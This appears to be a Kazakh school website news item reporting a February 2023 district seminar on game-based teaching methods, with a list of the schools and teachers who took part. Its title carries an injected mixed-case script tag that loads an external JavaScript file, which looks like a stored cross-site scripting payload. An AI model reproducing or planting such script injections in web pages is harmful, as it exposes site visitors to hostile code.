Оқушылардың танымдық іс-әрекетін арттыру үшін ойын технологиясын қолдану"<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.02.2023

13.02.2023 ж.Мәншүк ауылының ЖОББ мектебінде жаратылыстану-математикалық пән бірлестігі мұғалімдері серіктес және жетекші мектеп арасында "Оқушылардың танымдық іс-әрекетін арттыру үшін ойын технологиясын қолдану" тақырыбында аудандық семинар өткізді. Семинарға Жарлыкөл, Жалғызқұдық, Сарыкөл мектептерінің директорлары мен мұғалімдері, аудандық Білім бөлімінің әдіскері Қорғанбеков Е.С., Бірлік, Шалқар, Қаратомар ауылдарының мұғалімдері қатысты. Семинардың мақсаты серіктес мектептермен өзара тәжірибе бөлісу, оқытуда ойын технологиясын қолдана отырып, оқушылардың танымын, пәнге деген қызығушылығын арттыру. Семинарда мұғалімдер Койлыбаева АМ., Кожабекова А.Н., Евцихевич И.М., Сармулдиева Б.А., Төлегенова С.К., Казкенова А.Е. ашық сабақтар өткізіп өз тәжірибелерімен бөлісіп, жалпы өз ұйымшылдықтарын, шығармашылықтарын көрсетті.  Сондай-ақ семинарға қатысушылар оқытуда ойын технологиясын пайдаланудың тиімділігі, түрлері  жайлы коучингте өз ойларын талқыға салды.

Просмотров: 488


Пікір қосу



Деректерді қолтаңбаға қосу